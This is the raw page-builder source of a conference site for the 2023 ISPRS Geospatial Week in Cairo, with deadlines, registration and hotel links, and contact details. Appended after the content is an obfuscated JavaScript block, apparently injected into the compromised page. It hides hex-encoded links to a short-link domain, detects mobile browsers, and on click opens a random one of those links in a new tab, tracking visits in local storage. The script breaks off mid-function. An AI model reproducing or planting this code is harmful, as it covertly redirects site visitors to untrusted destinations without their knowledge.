src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\"][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][ultimate_heading main_heading=\"BOOK YOU HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgsw2023-venue%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1684295835404{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE INFORMATION[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 